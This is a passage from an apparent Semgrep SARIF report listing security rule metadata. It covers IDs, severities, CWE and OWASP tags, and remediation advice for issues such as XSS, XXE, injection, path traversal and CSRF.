[https://cheatsheetseries.owasp.org/cheatsheets/Cross_Site_Scripting_Prevention_Cheat_Sheet.html](https://cheatsheetseries.owasp.org/cheatsheets/Cross_Site_Scripting_Prevention_Cheat_Sheet.html)\n","text":"Untrusted input could be used to tamper with a web page rendering, which can lead to a Cross-site scripting (XSS) vulnerability. XSS vulnerabilities occur when untrusted input executes malicious JavaScript code, leading to issues such as account compromise and sensitive information leakage. Validate the user input, perform contextual output encoding, or sanitize the input. If you have to use dangerouslySetInnerHTML, consider using a sanitization library such as DOMPurify to sanitize the HTML within."},"helpUri":"https://semgrep.dev/r/typescript.nextjs.react-nextjs-router-refs.react-nextjs-router-refs","id":"typescript.nextjs.react-nextjs-router-refs.react-nextjs-router-refs","name":"typescript.nextjs.react-nextjs-router-refs.react-nextjs-router-refs","properties":{"precision":"very-high","tags":["CWE-79: Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')","HIGH CONFIDENCE","OWASP-A03:2021 - Injection","OWASP-A07:2017 - Cross-Site Scripting (XSS)","security"]},"shortDescription":{"text":"Semgrep Finding: typescript.nextjs.react-nextjs-router-refs.react-nextjs-router-refs"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"Avoid rendering user input. It may be possible for a malicious user to input a path that lets them access a template they shouldn't. To prevent this, check dynamic template paths against a predefined allowlist to make sure it's an allowed template."},"help":{"markdown":"Avoid rendering user input. It may be possible for a malicious user to input a path that lets them access a template they shouldn't. To prevent this, check dynamic template paths against a predefined allowlist to make sure it's an allowed template.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/ruby.rails.security.audit.xss.avoid-render-dynamic-path.avoid-render-dynamic-path)\n - [https://brakemanscanner.org/docs/warning_types/dynamic_render_paths/](https://brakemanscanner.org/docs/warning_types/dynamic_render_paths/)\n","text":"Avoid rendering user input. It may be possible for a malicious user to input a path that lets them access a template they shouldn't. To prevent this, check dynamic template paths against a predefined allowlist to make sure it's an allowed template."},"helpUri":"https://semgrep.dev/r/ruby.rails.security.audit.xss.avoid-render-dynamic-path.avoid-render-dynamic-path","id":"ruby.rails.security.audit.xss.avoid-render-dynamic-path.avoid-render-dynamic-path","name":"ruby.rails.security.audit.xss.avoid-render-dynamic-path.avoid-render-dynamic-path","properties":{"precision":"very-high","tags":["CWE-22: Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')","MEDIUM CONFIDENCE","OWASP-A01:2021 - Broken Access Control","OWASP-A05:2017 - Broken Access Control","security"]},"shortDescription":{"text":"Semgrep Finding: ruby.rails.security.audit.xss.avoid-render-dynamic-path.avoid-render-dynamic-path"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"The application is using an XML parser that has not been safely configured. This might lead to XML External Entity (XXE) vulnerabilities when parsing user-controlled input. An attacker can include document type definitions (DTDs) or XIncludes which can interact with internal or external hosts. XXE can lead to other vulnerabilities, such as Local File Inclusion (LFI), Remote Code Execution (RCE), and Server-side request forgery (SSRF), depending on the application configuration. An attacker can also use DTDs to expand recursively, leading to a Denial-of-Service (DoS) attack, also known as a `Billion Laughs Attack`. The best defense against XXE is to have an XML parser that supports disabling DTDs. Limiting the use of external entities from the start can prevent the parser from being used to process untrusted XML files. Reducing dependencies on external resources is also a good practice for performance reasons. It is difficult to guarantee that even a trusted XML file on your server or during transmission has not been tampered with by a malicious third-party."},"help":{"markdown":"The application is using an XML parser that has not been safely configured. This might lead to XML External Entity (XXE) vulnerabilities when parsing user-controlled input. An attacker can include document type definitions (DTDs) or XIncludes which can interact with internal or external hosts. XXE can lead to other vulnerabilities, such as Local File Inclusion (LFI), Remote Code Execution (RCE), and Server-side request forgery (SSRF), depending on the application configuration. An attacker can also use DTDs to expand recursively, leading to a Denial-of-Service (DoS) attack, also known as a `Billion Laughs Attack`. The best defense against XXE is to have an XML parser that supports disabling DTDs. Limiting the use of external entities from the start can prevent the parser from being used to process untrusted XML files. Reducing dependencies on external resources is also a good practice for performance reasons. It is difficult to guarantee that even a trusted XML file on your server or during transmission has not been tampered with by a malicious third-party.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/python.django.xml.tainted-django-xml-libxml2.tainted-django-xml-libxml2)\n - [https://github.com/vingd/libxml2-python/blob/libxml2-python-2.9.1/libxml2.py](https://github.com/vingd/libxml2-python/blob/libxml2-python-2.9.1/libxml2.py)\n - [https://gitlab.gnome.org/GNOME/libxml2/-/wikis/Python-bindings](https://gitlab.gnome.org/GNOME/libxml2/-/wikis/Python-bindings)\n - [https://owasp.org/Top10/A05_2021-Security_Misconfiguration](https://owasp.org/Top10/A05_2021-Security_Misconfiguration)\n","text":"The application is using an XML parser that has not been safely configured. This might lead to XML External Entity (XXE) vulnerabilities when parsing user-controlled input. An attacker can include document type definitions (DTDs) or XIncludes which can interact with internal or external hosts. XXE can lead to other vulnerabilities, such as Local File Inclusion (LFI), Remote Code Execution (RCE), and Server-side request forgery (SSRF), depending on the application configuration. An attacker can also use DTDs to expand recursively, leading to a Denial-of-Service (DoS) attack, also known as a `Billion Laughs Attack`. The best defense against XXE is to have an XML parser that supports disabling DTDs. Limiting the use of external entities from the start can prevent the parser from being used to process untrusted XML files. Reducing dependencies on external resources is also a good practice for performance reasons. It is difficult to guarantee that even a trusted XML file on your server or during transmission has not been tampered with by a malicious third-party."},"helpUri":"https://semgrep.dev/r/python.django.xml.tainted-django-xml-libxml2.tainted-django-xml-libxml2","id":"python.django.xml.tainted-django-xml-libxml2.tainted-django-xml-libxml2","name":"python.django.xml.tainted-django-xml-libxml2.tainted-django-xml-libxml2","properties":{"precision":"very-high","tags":["CWE-611: Improper Restriction of XML External Entity Reference","HIGH CONFIDENCE","OWASP-A04:2017 - XML External Entities (XXE)","OWASP-A05:2021 - Security Misconfiguration","security"]},"shortDescription":{"text":"Semgrep Finding: python.django.xml.tainted-django-xml-libxml2.tainted-django-xml-libxml2"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"Untrusted input might be used to build a database query, which can lead to a NoSQL injection vulnerability. An attacker can execute malicious NoSQL statements and gain unauthorized access to sensitive data, modify, delete data, or execute arbitrary system commands. Make sure all user input is validated and sanitized, and avoid if possible to use it to construct the NoSQL statement."},"help":{"markdown":"Untrusted input might be used to build a database query, which can lead to a NoSQL injection vulnerability. An attacker can execute malicious NoSQL statements and gain unauthorized access to sensitive data, modify, delete data, or execute arbitrary system commands. Make sure all user input is validated and sanitized, and avoid if possible to use it to construct the NoSQL statement.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/java.servlets.security.nosql-injection-servlets.nosql-injection-servlets)\n - [https://cheatsheetseries.owasp.org/cheatsheets/SQL_Injection_Prevention_Cheat_Sheet.html](https://cheatsheetseries.owasp.org/cheatsheets/SQL_Injection_Prevention_Cheat_Sheet.html)\n - [https://owasp.org/www-community/attacks/SQL_Injection](https://owasp.org/www-community/attacks/SQL_Injection)\n","text":"Untrusted input might be used to build a database query, which can lead to a NoSQL injection vulnerability. An attacker can execute malicious NoSQL statements and gain unauthorized access to sensitive data, modify, delete data, or execute arbitrary system commands. Make sure all user input is validated and sanitized, and avoid if possible to use it to construct the NoSQL statement."},"helpUri":"https://semgrep.dev/r/java.servlets.security.nosql-injection-servlets.nosql-injection-servlets","id":"java.servlets.security.nosql-injection-servlets.nosql-injection-servlets","name":"java.servlets.security.nosql-injection-servlets.nosql-injection-servlets","properties":{"precision":"very-high","tags":["CWE-89: Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')","HIGH CONFIDENCE","OWASP-A01:2017 - Injection","OWASP-A03:2021 - Injection","security"]},"shortDescription":{"text":"Semgrep Finding: java.servlets.security.nosql-injection-servlets.nosql-injection-servlets"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"A byte-string (narrow string) is used in an API that expects a wide-string. This can trigger an out-of-bounds read."},"help":{"markdown":"A byte-string (narrow string) is used in an API that expects a wide-string. This can trigger an out-of-bounds read.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/cpp.lang.security.strings.narrow-to-wide-string-mismatch.narrow-to-wide-string-mismatch)\n - [https://wiki.sei.cmu.edu/confluence/display/c/STR38-C.+Do+not+confuse+narrow+and+wide+character+strings+and+functions](https://wiki.sei.cmu.edu/confluence/display/c/STR38-C.+Do+not+confuse+narrow+and+wide+character+strings+and+functions)\n","text":"A byte-string (narrow string) is used in an API that expects a wide-string. This can trigger an out-of-bounds read."},"helpUri":"https://semgrep.dev/r/cpp.lang.security.strings.narrow-to-wide-string-mismatch.narrow-to-wide-string-mismatch","id":"cpp.lang.security.strings.narrow-to-wide-string-mismatch.narrow-to-wide-string-mismatch","name":"cpp.lang.security.strings.narrow-to-wide-string-mismatch.narrow-to-wide-string-mismatch","properties":{"precision":"very-high","tags":["CWE-125: Out-of-bounds Read","HIGH CONFIDENCE","security"]},"shortDescription":{"text":"Semgrep Finding: cpp.lang.security.strings.narrow-to-wide-string-mismatch.narrow-to-wide-string-mismatch"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"Ensure EMR is encrypted at rest using KMS CMKs. CMKs gives you control over the encryption key in terms of access and rotation."},"help":{"markdown":"Ensure EMR is encrypted at rest using KMS CMKs. CMKs gives you control over the encryption key in terms of access and rotation.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/terraform.aws.security.aws-emr-encrypted-with-cmk.aws-emr-encrypted-with-cmk)\n - [https://owasp.org/Top10/A02_2021-Cryptographic_Failures](https://owasp.org/Top10/A02_2021-Cryptographic_Failures)\n","text":"Ensure EMR is encrypted at rest using KMS CMKs. CMKs gives you control over the encryption key in terms of access and rotation."},"helpUri":"https://semgrep.dev/r/terraform.aws.security.aws-emr-encrypted-with-cmk.aws-emr-encrypted-with-cmk","id":"terraform.aws.security.aws-emr-encrypted-with-cmk.aws-emr-encrypted-with-cmk","name":"terraform.aws.security.aws-emr-encrypted-with-cmk.aws-emr-encrypted-with-cmk","properties":{"precision":"very-high","tags":["CWE-320: CWE CATEGORY: Key Management Errors","LOW CONFIDENCE","OWASP-A03:2017 - Sensitive Data Exposure","security"]},"shortDescription":{"text":"Semgrep Finding: terraform.aws.security.aws-emr-encrypted-with-cmk.aws-emr-encrypted-with-cmk"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"Found direct access to a PHP variable wihout HTML escaping inside an inline PHP statement setting data from `$_REQUEST[...]`. When untrusted input can be used to tamper with a web page rendering, it can lead to a Cross-site scripting (XSS) vulnerability. XSS vulnerabilities occur when untrusted input executes malicious JavaScript code, leading to issues such as account compromise and sensitive information leakage. To prevent this vulnerability, validate the user input, perform contextual output encoding or sanitize the input. In PHP you can encode or sanitize user input with `htmlspecialchars` or use automatic context-aware escaping with a template engine such as Latte."},"help":{"markdown":"Found direct access to a PHP variable wihout HTML escaping inside an inline PHP statement setting data from `$_REQUEST[...]`. When untrusted input can be used to tamper with a web page rendering, it can lead to a Cross-site scripting (XSS) vulnerability. XSS vulnerabilities occur when untrusted input executes malicious JavaScript code, leading to issues such as account compromise and sensitive information leakage. To prevent this vulnerability, validate the user input, perform contextual output encoding or sanitize the input. In PHP you can encode or sanitize user input with `htmlspecialchars` or use automatic context-aware escaping with a template engine such as Latte.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/php.lang.security.taint-unsafe-echo-tag.taint-unsafe-echo-tag)\n - [https://www.php.net/manual/en/language.basic-syntax.phptags.php](https://www.php.net/manual/en/language.basic-syntax.phptags.php)\n","text":"Found direct access to a PHP variable wihout HTML escaping inside an inline PHP statement setting data from `$_REQUEST[...]`. When untrusted input can be used to tamper with a web page rendering, it can lead to a Cross-site scripting (XSS) vulnerability. XSS vulnerabilities occur when untrusted input executes malicious JavaScript code, leading to issues such as account compromise and sensitive information leakage. To prevent this vulnerability, validate the user input, perform contextual output encoding or sanitize the input. In PHP you can encode or sanitize user input with `htmlspecialchars` or use automatic context-aware escaping with a template engine such as Latte."},"helpUri":"https://semgrep.dev/r/php.lang.security.taint-unsafe-echo-tag.taint-unsafe-echo-tag","id":"php.lang.security.taint-unsafe-echo-tag.taint-unsafe-echo-tag","name":"php.lang.security.taint-unsafe-echo-tag.taint-unsafe-echo-tag","properties":{"precision":"very-high","tags":["CWE-79: Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')","MEDIUM CONFIDENCE","OWASP-A03:2021 - Injection","OWASP-A07:2017 - Cross-Site Scripting (XSS)","security"]},"shortDescription":{"text":"Semgrep Finding: php.lang.security.taint-unsafe-echo-tag.taint-unsafe-echo-tag"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"$type extension has the potential to be unsafe, so use it with common sense and known json sources and not public facing ones to be safe"},"help":{"markdown":"$type extension has the potential to be unsafe, so use it with common sense and known json sources and not public facing ones to be safe\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/csharp.lang.security.insecure-deserialization.fast-json.insecure-fastjson-deserialization)\n - [https://github.com/mgholam/fastJSON#security-warning-update](https://github.com/mgholam/fastJSON#security-warning-update)\n","text":"$type extension has the potential to be unsafe, so use it with common sense and known json sources and not public facing ones to be safe"},"helpUri":"https://semgrep.dev/r/csharp.lang.security.insecure-deserialization.fast-json.insecure-fastjson-deserialization","id":"csharp.lang.security.insecure-deserialization.fast-json.insecure-fastjson-deserialization","name":"csharp.lang.security.insecure-deserialization.fast-json.insecure-fastjson-deserialization","properties":{"precision":"very-high","tags":["CWE-502: Deserialization of Untrusted Data","LOW CONFIDENCE","OWASP-A08:2017 - Insecure Deserialization","OWASP-A08:2021 - Software and Data Integrity Failures","security"]},"shortDescription":{"text":"Semgrep Finding: csharp.lang.security.insecure-deserialization.fast-json.insecure-fastjson-deserialization"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"The code must not contain any of Unicode Direction Control Characters"},"help":{"markdown":"The code must not contain any of Unicode Direction Control Characters\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/solidity.security.no-bidi-characters.no-bidi-characters)\n - [https://entethalliance.org/specs/ethtrust-sl/v1/#req-1-unicode-bdo](https://entethalliance.org/specs/ethtrust-sl/v1/#req-1-unicode-bdo)\n","text":"The code must not contain any of Unicode Direction Control Characters"},"helpUri":"https://semgrep.dev/r/solidity.security.no-bidi-characters.no-bidi-characters","id":"solidity.security.no-bidi-characters.no-bidi-characters","name":"solidity.security.no-bidi-characters.no-bidi-characters","properties":{"precision":"very-high","tags":["CWE-837: Improper Enforcement of a Single, Unique Action","HIGH CONFIDENCE","security"]},"shortDescription":{"text":"Semgrep Finding: solidity.security.no-bidi-characters.no-bidi-characters"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"Found 'importlib.resources', which is a module only available on Python 3.7+. This does not work in lower versions, and therefore is not backwards compatible. Use importlib_resources instead for older Python versions."},"help":{"markdown":"Found 'importlib.resources', which is a module only available on Python 3.7+. This does not work in lower versions, and therefore is not backwards compatible. Use importlib_resources instead for older Python versions.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/python.lang.compatibility.python37.python37-compatibility-importlib2)\n","text":"Found 'importlib.resources', which is a module only available on Python 3.7+. This does not work in lower versions, and therefore is not backwards compatible. Use importlib_resources instead for older Python versions."},"helpUri":"https://semgrep.dev/r/python.lang.compatibility.python37.python37-compatibility-importlib2","id":"python.lang.compatibility.python37.python37-compatibility-importlib2","name":"python.lang.compatibility.python37.python37-compatibility-importlib2","properties":{"precision":"very-high","tags":[]},"shortDescription":{"text":"Semgrep Finding: python.lang.compatibility.python37.python37-compatibility-importlib2"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"Detected user input going into a php include or require command, which can lead to path traversal and sensitive data being exposed. These commands can also lead to code execution. Instead, allowlist files that the user can access or rigorously validate user input."},"help":{"markdown":"Detected user input going into a php include or require command, which can lead to path traversal and sensitive data being exposed. These commands can also lead to code execution. Instead, allowlist files that the user can access or rigorously validate user input.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/php.lang.security.tainted-path-traversal.tainted-path-traversal)\n - [https://medium.com/@emmapinheiro42/php-include-ignore-4a3ba81371af](https://medium.com/@emmapinheiro42/php-include-ignore-4a3ba81371af)\n - [https://www.acunetix.com/websitesecurity/php-security-2/](https://www.acunetix.com/websitesecurity/php-security-2/)\n","text":"Detected user input going into a php include or require command, which can lead to path traversal and sensitive data being exposed. These commands can also lead to code execution. Instead, allowlist files that the user can access or rigorously validate user input."},"helpUri":"https://semgrep.dev/r/php.lang.security.tainted-path-traversal.tainted-path-traversal","id":"php.lang.security.tainted-path-traversal.tainted-path-traversal","name":"php.lang.security.tainted-path-traversal.tainted-path-traversal","properties":{"precision":"very-high","tags":["CWE-23: Relative Path Traversal","HIGH CONFIDENCE","OWASP-A01:2021 - Broken Access Control","security"]},"shortDescription":{"text":"Semgrep Finding: php.lang.security.tainted-path-traversal.tainted-path-traversal"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"Untrusted input might be injected into a command executed by the application, which can lead to a command injection vulnerability. An attacker can execute arbitrary commands, potentially gaining complete control of the system. To prevent this vulnerability, avoid executing OS commands with user input. If this is unavoidable, validate and sanitize the input, and use safe methods for executing the commands. Untrusted input in a command can lead to command injection, allowing attackers to execute arbitrary commands and gain control of the system. To prevent this: 1. Avoid direct command execution: Don't run OS commands with user input directly. 2. Validate and sanitize input: Ensure input is safe by removing or escaping dangerous characters. 3. (preferred) Use safe methods: Use `subprocess.run` without `shell=True` to safely execute commands, as it doesn't call a system shell by default. If `shell=True` is necessary, properly quote and escape all input to prevent shell injection. This is a secure by default approach."},"help":{"markdown":"Untrusted input might be injected into a command executed by the application, which can lead to a command injection vulnerability. An attacker can execute arbitrary commands, potentially gaining complete control of the system. To prevent this vulnerability, avoid executing OS commands with user input. If this is unavoidable, validate and sanitize the input, and use safe methods for executing the commands. Untrusted input in a command can lead to command injection, allowing attackers to execute arbitrary commands and gain control of the system. To prevent this: 1. Avoid direct command execution: Don't run OS commands with user input directly. 2. Validate and sanitize input: Ensure input is safe by removing or escaping dangerous characters. 3. (preferred) Use safe methods: Use `subprocess.run` without `shell=True` to safely execute commands, as it doesn't call a system shell by default. If `shell=True` is necessary, properly quote and escape all input to prevent shell injection. This is a secure by default approach.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/python.fastapi.os.tainted-os-command-stdlib-fastapi-secure-default.tainted-os-command-stdlib-fastapi-secure-default)\n - [https://docs.python.org/3/library/os.html](https://docs.python.org/3/library/os.html)\n - [https://docs.python.org/3/library/subprocess.html#using-the-subprocess-module](https://docs.python.org/3/library/subprocess.html#using-the-subprocess-module)\n - [https://owasp.org/Top10/A03_2021-Injection](https://owasp.org/Top10/A03_2021-Injection)\n - [https://semgrep.dev/docs/cheat-sheets/python-command-injection/](https://semgrep.dev/docs/cheat-sheets/python-command-injection/)\n - [https://stackless.readthedocs.io/en/v2.7.16-slp/library/commands.html](https://stackless.readthedocs.io/en/v2.7.16-slp/library/commands.html)\n","text":"Untrusted input might be injected into a command executed by the application, which can lead to a command injection vulnerability. An attacker can execute arbitrary commands, potentially gaining complete control of the system. To prevent this vulnerability, avoid executing OS commands with user input. If this is unavoidable, validate and sanitize the input, and use safe methods for executing the commands. Untrusted input in a command can lead to command injection, allowing attackers to execute arbitrary commands and gain control of the system. To prevent this: 1. Avoid direct command execution: Don't run OS commands with user input directly. 2. Validate and sanitize input: Ensure input is safe by removing or escaping dangerous characters. 3. (preferred) Use safe methods: Use `subprocess.run` without `shell=True` to safely execute commands, as it doesn't call a system shell by default. If `shell=True` is necessary, properly quote and escape all input to prevent shell injection. This is a secure by default approach."},"helpUri":"https://semgrep.dev/r/python.fastapi.os.tainted-os-command-stdlib-fastapi-secure-default.tainted-os-command-stdlib-fastapi-secure-default","id":"python.fastapi.os.tainted-os-command-stdlib-fastapi-secure-default.tainted-os-command-stdlib-fastapi-secure-default","name":"python.fastapi.os.tainted-os-command-stdlib-fastapi-secure-default.tainted-os-command-stdlib-fastapi-secure-default","properties":{"precision":"very-high","tags":["CWE-78: Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection')","HIGH CONFIDENCE","OWASP-A01:2017 - Injection","OWASP-A03:2021 - Injection","security"]},"shortDescription":{"text":"Semgrep Finding: python.fastapi.os.tainted-os-command-stdlib-fastapi-secure-default.tainted-os-command-stdlib-fastapi-secure-default"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"SSL verification disabled, this allows for MitM attacks"},"help":{"markdown":"SSL verification disabled, this allows for MitM attacks\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/rust.lang.security.ssl-verify-none.ssl-verify-none)\n - [https://docs.rs/openssl/latest/openssl/ssl/struct.SslContextBuilder.html#method.set_verify](https://docs.rs/openssl/latest/openssl/ssl/struct.SslContextBuilder.html#method.set_verify)\n","text":"SSL verification disabled, this allows for MitM attacks"},"helpUri":"https://semgrep.dev/r/rust.lang.security.ssl-verify-none.ssl-verify-none","id":"rust.lang.security.ssl-verify-none.ssl-verify-none","name":"rust.lang.security.ssl-verify-none.ssl-verify-none","properties":{"precision":"very-high","tags":["CWE-295: Improper Certificate Validation","HIGH CONFIDENCE","security"]},"shortDescription":{"text":"Semgrep Finding: rust.lang.security.ssl-verify-none.ssl-verify-none"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"Found dynamic content used for the external process. This is dangerous if arbitrary data can reach this function call because it allows a malicious actor to execute commands. Ensure your variables are not controlled by users or sufficiently sanitized."},"help":{"markdown":"Found dynamic content used for the external process. This is dangerous if arbitrary data can reach this function call because it allows a malicious actor to execute commands. Ensure your variables are not controlled by users or sufficiently sanitized.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/scala.lang.security.audit.dangerous-shell-run.dangerous-shell-run)\n - [https://owasp.org/Top10/A03_2021-Injection](https://owasp.org/Top10/A03_2021-Injection)\n","text":"Found dynamic content used for the external process. This is dangerous if arbitrary data can reach this function call because it allows a malicious actor to execute commands. Ensure your variables are not controlled by users or sufficiently sanitized."},"helpUri":"https://semgrep.dev/r/scala.lang.security.audit.dangerous-shell-run.dangerous-shell-run","id":"scala.lang.security.audit.dangerous-shell-run.dangerous-shell-run","name":"scala.lang.security.audit.dangerous-shell-run.dangerous-shell-run","properties":{"precision":"very-high","tags":["CWE-78: Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection')","LOW CONFIDENCE","OWASP-A01:2017 - Injection","OWASP-A03:2021 - Injection","security"]},"shortDescription":{"text":"Semgrep Finding: scala.lang.security.audit.dangerous-shell-run.dangerous-shell-run"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"Cryptographic algorithms are notoriously difficult to get right. By implementing a custom message digest, you risk introducing security issues into your program. Use one of the many sound message digests already available to you: MessageDigest sha256Digest = MessageDigest.getInstance(\"SHA256\");"},"help":{"markdown":"Cryptographic algorithms are notoriously difficult to get right. By implementing a custom message digest, you risk introducing security issues into your program. Use one of the many sound message digests already available to you: MessageDigest sha256Digest = MessageDigest.getInstance(\"SHA256\");\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/java.lang.security.audit.crypto.ssl.avoid-implementing-custom-digests.avoid-implementing-custom-digests)\n - [https://cheatsheetseries.owasp.org/cheatsheets/Cryptographic_Storage_Cheat_Sheet.html#custom-algorithms](https://cheatsheetseries.owasp.org/cheatsheets/Cryptographic_Storage_Cheat_Sheet.html#custom-algorithms)\n","text":"Cryptographic algorithms are notoriously difficult to get right. By implementing a custom message digest, you risk introducing security issues into your program. Use one of the many sound message digests already available to you: MessageDigest sha256Digest = MessageDigest.getInstance(\"SHA256\");"},"helpUri":"https://semgrep.dev/r/java.lang.security.audit.crypto.ssl.avoid-implementing-custom-digests.avoid-implementing-custom-digests","id":"java.lang.security.audit.crypto.ssl.avoid-implementing-custom-digests.avoid-implementing-custom-digests","name":"java.lang.security.audit.crypto.ssl.avoid-implementing-custom-digests.avoid-implementing-custom-digests","properties":{"precision":"very-high","tags":["CWE-327: Use of a Broken or Risky Cryptographic Algorithm","LOW CONFIDENCE","OWASP-A02:2021 - Cryptographic Failures","OWASP-A03:2017 - Sensitive Data Exposure","security"]},"shortDescription":{"text":"Semgrep Finding: java.lang.security.audit.crypto.ssl.avoid-implementing-custom-digests.avoid-implementing-custom-digests"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"'html_safe()' does not make the supplied string safe. 'html_safe()' bypasses HTML escaping. If external data can reach here, this exposes your application to cross-site scripting (XSS) attacks. Ensure no external data reaches here."},"help":{"markdown":"'html_safe()' does not make the supplied string safe. 'html_safe()' bypasses HTML escaping. If external data can reach here, this exposes your application to cross-site scripting (XSS) attacks. Ensure no external data reaches here.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/ruby.rails.security.audit.xss.avoid-html-safe.avoid-html-safe)\n - [https://github.com/presidentbeef/brakeman/blob/main/docs/warning_types/cross_site_scripting/index.markdown](https://github.com/presidentbeef/brakeman/blob/main/docs/warning_types/cross_site_scripting/index.markdown)\n - [https://www.netsparker.com/blog/web-security/preventing-xss-ruby-on-rails-web-applications/](https://www.netsparker.com/blog/web-security/preventing-xss-ruby-on-rails-web-applications/)\n","text":"'html_safe()' does not make the supplied string safe. 'html_safe()' bypasses HTML escaping. If external data can reach here, this exposes your application to cross-site scripting (XSS) attacks. Ensure no external data reaches here."},"helpUri":"https://semgrep.dev/r/ruby.rails.security.audit.xss.avoid-html-safe.avoid-html-safe","id":"ruby.rails.security.audit.xss.avoid-html-safe.avoid-html-safe","name":"ruby.rails.security.audit.xss.avoid-html-safe.avoid-html-safe","properties":{"precision":"very-high","tags":["CWE-79: Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')","LOW CONFIDENCE","OWASP-A03:2021 - Injection","OWASP-A07:2017 - Cross-Site Scripting (XSS)","security"]},"shortDescription":{"text":"Semgrep Finding: ruby.rails.security.audit.xss.avoid-html-safe.avoid-html-safe"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"The application builds a file path from potentially untrusted data, which can lead to a path traversal vulnerability. An attacker can manipulate the path which the application uses to access files. If the application does not validate user input and sanitize file paths, sensitive files such as configuration or user data can be accessed, potentially creating or overwriting files. To prevent this vulnerability, validate and sanitize any input that is used to create references to file paths. Also, enforce strict file access controls. For example, choose privileges allowing public-facing applications to access only the required files."},"help":{"markdown":"The application builds a file path from potentially untrusted data, which can lead to a path traversal vulnerability. An attacker can manipulate the path which the application uses to access files. If the application does not validate user input and sanitize file paths, sensitive files such as configuration or user data can be accessed, potentially creating or overwriting files. To prevent this vulnerability, validate and sanitize any input that is used to create references to file paths. Also, enforce strict file access controls. For example, choose privileges allowing public-facing applications to access only the required files.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/python.django.file.tainted-path-traversal-toml-django.tainted-path-traversal-toml-django)\n - [https://owasp.org/Top10/A01_2021-Broken_Access_Control](https://owasp.org/Top10/A01_2021-Broken_Access_Control)\n - [https://owasp.org/www-community/attacks/Path_Traversal](https://owasp.org/www-community/attacks/Path_Traversal)\n - [https://portswigger.net/web-security/file-path-traversal](https://portswigger.net/web-security/file-path-traversal)\n - [https://www.stackhawk.com/blog/django-path-traversal-guide-examples-and-prevention/](https://www.stackhawk.com/blog/django-path-traversal-guide-examples-and-prevention/)\n","text":"The application builds a file path from potentially untrusted data, which can lead to a path traversal vulnerability. An attacker can manipulate the path which the application uses to access files. If the application does not validate user input and sanitize file paths, sensitive files such as configuration or user data can be accessed, potentially creating or overwriting files. To prevent this vulnerability, validate and sanitize any input that is used to create references to file paths. Also, enforce strict file access controls. For example, choose privileges allowing public-facing applications to access only the required files."},"helpUri":"https://semgrep.dev/r/python.django.file.tainted-path-traversal-toml-django.tainted-path-traversal-toml-django","id":"python.django.file.tainted-path-traversal-toml-django.tainted-path-traversal-toml-django","name":"python.django.file.tainted-path-traversal-toml-django.tainted-path-traversal-toml-django","properties":{"precision":"very-high","tags":["CWE-22: Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')","HIGH CONFIDENCE","OWASP-A01:2021 - Broken Access Control","OWASP-A05:2017 - Broken Access Control","security"]},"shortDescription":{"text":"Semgrep Finding: python.django.file.tainted-path-traversal-toml-django.tainted-path-traversal-toml-django"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"The application does not appear to verify inbound requests which can lead to a Cross-site request forgery (CSRF) vulnerability. If the application uses cookie-based authentication, an attacker can trick users into sending authenticated HTTP requests without their knowledge from any arbitrary domain they visit. To prevent this vulnerability start by identifying if the framework or library leveraged has built-in features or offers plugins for CSRF protection. CSRF tokens should be unique and securely random. The `Synchronizer Token` or `Double Submit Cookie` patterns with defense-in-depth mechanisms such as the `sameSite` cookie flag can help prevent CSRF. For more information, see: [Cross-site request forgery prevention](https://cheatsheetseries.owasp.org/cheatsheets/Cross-Site_Request_Forgery_Prevention_Cheat_Sheet.html)"},"help":{"markdown":"The application does not appear to verify inbound requests which can lead to a Cross-site request forgery (CSRF) vulnerability. If the application uses cookie-based authentication, an attacker can trick users into sending authenticated HTTP requests without their knowledge from any arbitrary domain they visit. To prevent this vulnerability start by identifying if the framework or library leveraged has built-in features or offers plugins for CSRF protection. CSRF tokens should be unique and securely random. The `Synchronizer Token` or `Double Submit Cookie` patterns with defense-in-depth mechanisms such as the `sameSite` cookie flag can help prevent CSRF. For more information, see: [Cross-site request forgery prevention](https://cheatsheetseries.owasp.org/cheatsheets/Cross-Site_Request_Forgery_Prevention_Cheat_Sheet.html)\n\nReferences:\n - [Semgrep 